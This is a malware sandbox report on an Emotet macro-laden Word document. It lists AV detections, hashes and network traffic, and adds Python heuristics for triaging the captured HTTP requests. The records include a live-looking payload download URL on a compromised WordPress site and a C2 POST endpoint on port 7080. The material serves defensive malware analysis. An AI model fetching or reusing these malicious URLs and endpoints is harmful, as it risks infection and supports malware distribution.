Analysis type | VM label | Start time | End time | Duration |
---|---|---|---|---|
File (Windows) | win7-sp1-x64-hpdapp01-1 | 2020-09-25 16:41:50 | 2020-09-25 16:44:12 | 142 s |
File name | 4763449172IW.doc |
---|---|
File size | 207695 bytes |
File type | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Quod., Author: Ambre Henry, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 24 20:42:00 2020, Last Saved Time/Date: Thu Sep 24 20:42:00 2020, Number of Pages: 1, Number of Words: 2393, Number of Characters: 13643, Security: 8 |
MD5 | 064af79391aa32492b3e8467099ee2a9 |
SHA1 | cf7e60b090575b299efb87d818c4e30157b567b0 |
SHA256 | fa773c6d7cbb0ad257bcbb9fee574b45b8b27505b3f0928726c4c1d257966fcc |
SHA512 | cea48dabb029d29e8cca09d0c9de87ec681ee979d2fdf9629728dd338f2443eef92f5827f7edc12d2247f9de5a31d75e2be103ebb878cf97074c9fa2b483262a |
CRC32 | 221F69B0 |
Ssdeep | 3072:6UqJ1NgsA8k/gvh0NZ0lGX1nZ7jZ/9nsYjs:6BtgVIveNZvnHyYjs |
No host records.
Antivirus engine / vendor | Detection name / rule match | Signature date |
---|---|---|
Bkav | Not detected | 20200925 |
Elastic | malicious (high confidence) | 20200917 |
Cynet | Not detected | 20200924 |
CMC | Not detected | 20200925 |
CAT-QuickHeal | W97M.Emotet.Heur | 20200925 |
McAfee | W97M/Downloader.dbv | 20200924 |
Malwarebytes | Not detected | 20200925 |
Zillya | Not detected | 20200925 |
Sangfor | Not detected | 20200814 |
K7AntiVirus | Trojan ( 0056edf51 ) | 20200925 |
K7GW | Trojan ( 0056edf51 ) | 20200925 |
Arcabit | Not detected | 20200925 |
TrendMicro | Trojan.W97M.EMOTET.TIOIBELH | 20200925 |
BitDefenderTheta | Not detected | 20200918 |
Cyren | W97M/Downldr.IE.gen!Eldorado | 20200925 |
Symantec | ISB.Downloader!gen411 | 20200925 |
ESET-NOD32 | VBA/TrojanDownloader.Agent.UFY | 20200925 |
Baidu | Not detected | 20190318 |
TrendMicro-HouseCall | Trojan.W97M.EMOTET.TIOIBELH | 20200925 |
Avast | Not detected | 20200925 |
ClamAV | Not detected | 20200924 |
Kaspersky | HEUR:Trojan.MSOffice.SAgent.gen | 20200925 |
BitDefender | Not detected | 20200925 |
NANO-Antivirus | Not detected | 20200925 |
ViRobot | Not detected | 20200925 |
SUPERAntiSpyware | Not detected | 20200918 |
MicroWorld-eScan | Not detected | 20200925 |
Tencent | Heur.Macro.Generic.h.7ebe026b | 20200925 |
Ad-Aware | Not detected | 20200925 |
Sophos | Mal/DocDl-K | 20200925 |
Comodo | Not detected | 20200925 |
F-Secure | Not detected | 20200925 |
DrWeb | Not detected | 20200925 |
VIPRE | Not detected | 20200925 |
Invincea | Mal/DocDl-K | 20200925 |
McAfee-GW-Edition | W97M/Downloader.dbv | 20200925 |
FireEye | Not detected | 20200925 |
Emsisoft | Not detected | 20200925 |
Ikarus | Win32.SuspectCrc | 20200925 |
Jiangmin | Not detected | 20200925 |
Avira | Not detected | 20200925 |
Antiy-AVL | Not detected | 20200925 |
Kingsoft | Not detected | 20200925 |
Microsoft | Not detected | 20200925 |
AegisLab | Not detected | 20200925 |
ZoneAlarm | HEUR:Trojan-Downloader.Script.Generic | 20200925 |
GData | Not detected | 20200925 |
TACHYON | Not detected | 20200925 |
AhnLab-V3 | Downloader/DOC.Emotet.S1294 | 20200925 |
VBA32 | Not detected | 20200924 |
ALYac | Not detected | 20200925 |
MAX | Not detected | 20200925 |
Zoner | Not detected | 20200920 |
Rising | Malware.ObfusVBA@ML.84 (VBA) | 20200925 |
Yandex | Not detected | 20200911 |
SentinelOne | DFI - Malicious OLE | 20200724 |
Fortinet | VBA/Agent.DBV!tr.dldr | 20200925 |
AVG | Not detected | 20200925 |
Panda | Not detected | 20200924 |
Qihoo-360 | virus.office.qexvmc.1090 | 20200925 |
No host records.
Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 49170 | 114.7.197.82 bappeda.barrukab.go.id | 80 |
192.168.122.201 | 49165 | 123.59.232.99 enews.enkj.com | 443 |
192.168.122.201 | 49162 | 162.241.154.46 qualitychildcarepreschool.com | 443 |
192.168.122.201 | 49174 | 162.241.41.111 | 7080 |
192.168.122.201 | 49163 | 209.205.123.182 www.sanambakshi.com | 443 |
192.168.122.201 | 49164 | 209.205.123.182 www.sanambakshi.com | 443 |
192.168.122.201 | 49158 | 23.198.99.176 acroipm.adobe.com | 80 |
192.168.122.201 | 49168 | 45.119.81.203 dagranitegiare.com | 443 |
Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 53225 | 192.168.122.1 | 53 |
192.168.122.201 | 60001 | 192.168.122.1 | 53 |
192.168.122.201 | 60293 | 192.168.122.1 | 53 |
192.168.122.201 | 61084 | 192.168.122.1 | 53 |
192.168.122.201 | 63282 | 192.168.122.1 | 53 |
192.168.122.201 | 63619 | 192.168.122.1 | 53 |
URI | HTTP data |
---|---|
http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip | GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache |
http://bappeda.barrukab.go.id/wp-content/B/ | GET /wp-content/B/ HTTP/1.1 Host: bappeda.barrukab.go.id Connection: Keep-Alive |
http://162.241.41.111:7080/Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ | POST /Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 162.241.41.111/Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-------------------yE178uOwNfqEIiQOVIn Host: 162.241.41.111:7080 Content-Length: 4564 Cache-Control: no-cache |
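The three plain-HTTP requests in the table above are worth reading side by side: a GET to acroipm.adobe.com with User-Agent IPM (an Adobe Reader in-product message check, VM background noise rather than sample activity), a GET to a /wp-content/ directory on a third-party WordPress site carrying only Host and Connection headers (the request Suricata later tagged as a PE download), and a multipart/form-data POST to a raw IP on port 7080 whose Referer has no scheme and simply mirrors the request path, the classic Emotet C2 shape. The Python below is an added example, not part of the sandbox output: it parses the three requests (reconstructed from the table with one header per line) and scores them on those traits. The indicator names, the minimal-header check and the verdict thresholds are this example's own assumptions, chosen to fit what this run shows.

```python
"""Heuristic triage of sandbox-captured HTTP requests (added example).

The sample requests are reconstructed from the report's HTTP table; the
indicator names and thresholds are assumptions made for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.x request head (request line plus headers)."""
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the headers; any body follows
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers)


IPV4_HOST = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}(?::(\d+))?$")
RANDOM_SEGMENT = re.compile(r"^[A-Za-z0-9]{4,32}$")


def c2_indicators(req: HttpRequest) -> list:
    """Traits of the port-7080 POST that a real browser would not produce."""
    hits = []
    host = req.headers.get("host", "")
    m = IPV4_HOST.match(host)
    if m:
        hits.append("host_is_raw_ip")
        port = int(m.group(1)) if m.group(1) else 80
        if port not in (80, 443):
            hits.append("nonstandard_port")
    if req.method == "POST" and req.headers.get("content-type", "").startswith("multipart/form-data"):
        hits.append("post_multipart")
    referer = req.headers.get("referer", "")
    if referer and not referer.lower().startswith(("http://", "https://")):
        hits.append("referer_without_scheme")
        if referer == host.split(":")[0] + req.path:
            hits.append("referer_mirrors_request")
    segments = [s for s in req.path.split("/") if s]
    if len(segments) >= 3 and req.path.endswith("/") and all(RANDOM_SEGMENT.match(s) for s in segments):
        hits.append("random_directory_path")
    return hits


def stage_download_indicators(req: HttpRequest) -> list:
    """Traits of the wp-content GET that Suricata flagged as a PE download."""
    hits = []
    if req.method != "GET":
        return hits
    if req.path.startswith("/wp-content/") and req.path.endswith("/"):
        hits.append("wp_content_directory_fetch")
    if set(req.headers) <= {"host", "connection"}:
        hits.append("no_browser_headers")  # no User-Agent, no Accept
    return hits


def classify(req: HttpRequest):
    """Return (verdict, indicators); the thresholds are assumptions."""
    c2 = c2_indicators(req)
    stage = stage_download_indicators(req)
    if "post_multipart" in c2 and len(c2) >= 4:
        return "emotet_like_c2", c2
    if len(stage) == 2:
        return "stage_download_candidate", stage
    return "benign_or_unknown", c2 + stage


# Constructed from the report's HTTP table (bodies omitted, some headers trimmed).
SAMPLE_REQUESTS = {
    "adobe_get": "\r\n".join([
        "GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1",
        "Accept: */*",
        "If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT",
        "User-Agent: IPM",
        "Host: acroipm.adobe.com",
        "Connection: Keep-Alive",
    ]),
    "stage_get": "\r\n".join([
        "GET /wp-content/B/ HTTP/1.1",
        "Host: bappeda.barrukab.go.id",
        "Connection: Keep-Alive",
    ]),
    "c2_post": "\r\n".join([
        "POST /Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ HTTP/1.1",
        "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: 162.241.41.111/Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/",
        "Content-Type: multipart/form-data; boundary=-------------------yE178uOwNfqEIiQOVIn",
        "Host: 162.241.41.111:7080",
        "Content-Length: 4564",
    ]),
}


def triage() -> dict:
    """Verdict per sample request, keyed by the names above."""
    return {name: classify(parse_request(raw))[0] for name, raw in SAMPLE_REQUESTS.items()}
```

Run against the three requests, `triage()` marks the adobe.com check benign, the wp-content fetch a stage-download candidate, and the port-7080 POST Emotet-like C2 on six indicators; the Referer-mirrors-request check alone separates it from ordinary form posts to bare IPs, because browsers always put a scheme in Referer.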
No SMTP traffic.
No IRC requests.
Source address | Destination address | ICMP type | Data |
---|---|---|---|
192.168.1.1 | 192.168.122.201 | 3 | |
No CIF results.
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2020-09-25 16:43:13.843713+0800 | 114.7.197.82 | 80 | 192.168.122.201 | 49170 | TCP | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Version | Issuer | Subject | Fingerprint |
---|---|---|---|---|---|---|---|---|
2020-09-25 16:42:42.876789+0800 | 192.168.122.201 | 49162 | 162.241.154.46 | 443 | TLSv1 | C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 | CN=qualitychildcarepreschool.com | b1:de:98:55:1f:1e:39:3e:19:82:d8:ac:50:fb:aa:f7:5f:7d:47:dc |
2020-09-25 16:43:09.983664+0800 | 192.168.122.201 | 49168 | 45.119.81.203 | 443 | TLSv1 | C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 | CN=dagranitegiare.com | 76:05:02:e7:c4:fb:83:cd:c5:94:50:b3:e6:18:2a:4a:cd:c1:92:e2 |
2020-09-25 16:42:46.049259+0800 | 192.168.122.201 | 49165 | 123.59.232.99 | 443 | TLSv1 | C=CN, O=WoTrus CA Limited, CN=WoTrus DV Server CA [Run by the Issuer] | CN=*.enkj.com | ca:e2:d2:34:5b:47:66:ba:36:e2:bf:09:22:50:28:dc:2f:af:2b:6a |
No Suricata HTTP
Task ID | 577658 |
---|---|
Mongo ID | 5f6dae632f8f2e0ab452d118 |
Cuckoo release | 1.4-Maldun |